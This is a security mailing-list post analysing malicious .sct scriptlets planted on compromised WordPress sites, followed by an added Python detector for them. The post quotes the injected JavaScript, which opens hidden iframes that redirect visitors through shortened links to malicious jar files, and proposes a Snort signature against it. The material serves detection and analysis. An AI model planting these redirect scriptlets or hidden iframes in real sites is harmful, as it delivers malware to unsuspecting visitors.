Snort mailing list archives
Malicious scriptlets
From: James Lay <jlay () slave-tothe-box net>
Date: Thu, 16 May 2013 11:16:32 -0600
So I've now seen two of these so far. Compromised site gets a bonus file...a .sct scriptlet file. These files had the initial header of the Sizzle CSS Engine:

badsite1.com/wp-includes/js/jquery/ie.sct
badsite2.biz/wp-content/themes/2012/css/themes.sct

/*
 * Sizzle CSS Selector Engine - v0.9.3
 * Copyright 2009, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 * More information: http://sizzlejs.com/
 */

but then goes on with the below (spaces added):

<s c r i p t l e t><implements type=behavior></implements><script>
xchk='_';
xurl='\x08//goo.gl/24vi1';
(xifr=document.createElement('iframe')).style.display='none';
document.body.appendChild(xifr);
with(xifr){
  id='xfid';
  addBehavior('#default#userData');
  load(xchk);
  if(!getAttribute(xchk)){
    setAttribute(xchk,'_');
    save(xchk);
    expires=(new Date((new Date()).getTime()+6e8)).toUTCString();
    src=xurl;
  }
}
</script></scriptlet>

The shortened goo.gl link points to bls.pw/ which apparently is "missing" an index.* page (hat tip to ET for detecting the .pw domain jazz).
The response is just as icky (snippets):

<t i t l e>404 Not Found</title>
<snip>
<h1>Not Found</h1>
<p>The requested URL / was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<!--[if gt IE 7]>
<s c r i p t type="text/javascript">
setTimeout('new Image().src="//goo.gl/9yBTe"',2500);
<snip>
...innerHTML+='<iframe/src="https:// goo.gl/1hpWA"style="position:absolute;left:-4200px;"onload="new Image().src=\'//goo.gl/hNVXP\'"></iframe>';
...innerHTML+='<iframe/src="https:// goo.gl/EVVWF"style="position:absolute;left:-4200px;"></iframe>';

The shortened links are currently serving up nasty jar files:

https://www.virustotal.com/en/file/c4d37ef0e60e940527061444e1575a8e555dbe91ccb7e0fb5469a9c08f94de0f/analysis/1368718511/

Sig below should catch the response from the compromised server:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"INDICATOR-COMPROMISED Scriptlet file with iframe redirect"; flow:from_server,established; file_data; content:"<scriptlet"; content:"url="; content:"iframe"; metadata:policy balanced-ips drop, policy security-ips drop, service http; metadata:ruleset community; classtype:trojan-activity; sid:10000060; rev:1;)

Anything to help make the sig better would be much appreciated.

James
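The following is an added example, not part of James Lay's post or of any Snort ruleset. It re-implements the three content matches of the signature above over HTTP response bodies and adds two checks the signature as posted does not make: decoding the escaped JavaScript string so the hidden redirect URL can be recovered, and finding the off-screen iframes injected by the 404 page. Two Snort details drive the design: content matches without distance/within are each searched independently over the whole buffer (so the three strings can match out of order), and adding distance:0 to the second and third content makes them relative to the previous match; and browser URL parsers strip leading control characters and whitespace, which is why the \x08 in front of //goo.gl/24vi1 still loads in the browser but defeats a literal search for "//goo.gl". The sample bodies (SCRIPTLET_BODY, NOTFOUND_BODY, OUT_OF_ORDER_BODY) are constructed for this example from the snippets in the post.

```python
"""Added example (not from the post or the Snort ruleset): the rule's content
matches re-implemented over HTTP response bodies, plus two checks the rule
does not make. All sample bodies are constructed for this example."""
import re

# Constructed sample modelled on the .sct scriptlet quoted in the post.
SCRIPTLET_BODY = (
    b"/* Sizzle CSS Selector Engine - v0.9.3 */\n"
    b"<scriptlet><implements type=behavior></implements><script>"
    b"xchk='_';xurl='\\x08//goo.gl/24vi1';"
    b"(xifr=document.createElement('iframe')).style.display='none';"
    b"document.body.appendChild(xifr);with(xifr){id='xfid';"
    b"addBehavior('#default#userData');load(xchk);if(!getAttribute(xchk)){"
    b"setAttribute(xchk,'_');save(xchk);src=xurl;}}</script></scriptlet>"
)

# Constructed sample modelled on the 404 page served by the redirect target.
NOTFOUND_BODY = (
    b"<title>404 Not Found</title><h1>Not Found</h1>"
    b"<!--[if gt IE 7]><script type=\"text/javascript\">"
    b"setTimeout('new Image().src=\"//goo.gl/9yBTe\"',2500);"
    b"document.body.innerHTML+='<iframe/src=\"https://goo.gl/1hpWA\""
    b"style=\"position:absolute;left:-4200px;\""
    b"onload=\"new Image().src=\\'//goo.gl/hNVXP\\'\"></iframe>';"
    b"document.body.innerHTML+='<iframe/src=\"https://goo.gl/EVVWF\""
    b"style=\"position:absolute;left:-4200px;\"></iframe>';"
    b"</script><![endif]-->"
)

# Constructed benign page: all three rule contents present, but out of order.
OUT_OF_ORDER_BODY = b"<a href='?iframe=1&url=x'>docs</a><!-- <scriptlet> tag -->"

# The rule's content matches, in the order they appear in the rule.
RULE_CONTENTS = (b"<scriptlet", b"url=", b"iframe")


def matches_rule(body, relative=False):
    """Re-implement the rule's three content matches.

    relative=False is the rule as posted: each content is searched
    independently over the whole body (no distance/within modifiers).
    relative=True is what adding 'distance:0' to the 2nd and 3rd content
    would enforce: each match must start after the previous one ended.
    """
    pos = 0
    for needle in RULE_CONTENTS:
        idx = body.find(needle, pos if relative else 0)
        if idx < 0:
            return False
        pos = idx + len(needle)
    return True


# Single- or double-quoted JS string literals, honouring backslash escapes.
JS_STRING_RE = re.compile(rb"'((?:\\.|[^'\\])*)'|\"((?:\\.|[^\"\\])*)\"")
# What a browser's URL parser strips from the ends of an input: C0 controls and space.
C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def redirect_urls(body):
    """Decode every JS string literal in the body and return those that are
    URLs once leading/trailing control characters are stripped, the way the
    browser sees them. '\\x08//goo.gl/24vi1' therefore comes back as
    '//goo.gl/24vi1' (protocol-relative) even though the raw bytes never
    contain '//goo.gl'."""
    found = []
    for m in JS_STRING_RE.finditer(body):
        literal = m.group(1) if m.group(1) is not None else m.group(2)
        try:
            decoded = literal.decode("unicode_escape")  # \xHH, \uHHHH, \' ...
        except UnicodeDecodeError:
            continue
        cleaned = decoded.strip(C0_AND_SPACE)
        if cleaned.startswith("//") or re.match(r"[a-z][a-z0-9+.-]*:", cleaned, re.I):
            found.append(cleaned)
    return found


# An iframe whose src is followed (in the same tag) by display:none or a large
# negative left offset, as in the 404 page's injected frames.
IFRAME_RE = re.compile(
    rb"<iframe\b[^>]*?src\s*=\s*[\"']([^\"']+)[\"'][^>]*?"
    rb"(?:display\s*:\s*none|left\s*:\s*-\d{3,}px)",
    re.I,
)


def hidden_iframes(body):
    """Return the src of every invisible/off-screen iframe in the body."""
    return [m.group(1).decode("latin-1") for m in IFRAME_RE.finditer(body)]


if __name__ == "__main__":
    samples = (("scriptlet", SCRIPTLET_BODY), ("404 page", NOTFOUND_BODY),
               ("benign", OUT_OF_ORDER_BODY))
    for name, body in samples:
        print(f"{name:10} rule={matches_rule(body)} "
              f"rule+distance:0={matches_rule(body, relative=True)} "
              f"urls={redirect_urls(body)} hidden_iframes={hidden_iframes(body)}")
```

Running it shows the posted rule fires on the scriptlet, does not fire on the 404 page (no "<scriptlet" there, so the second-stage response needs its own rule keyed on the off-screen iframe), and, without distance:0, also fires on the constructed benign page where the three strings appear out of order.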
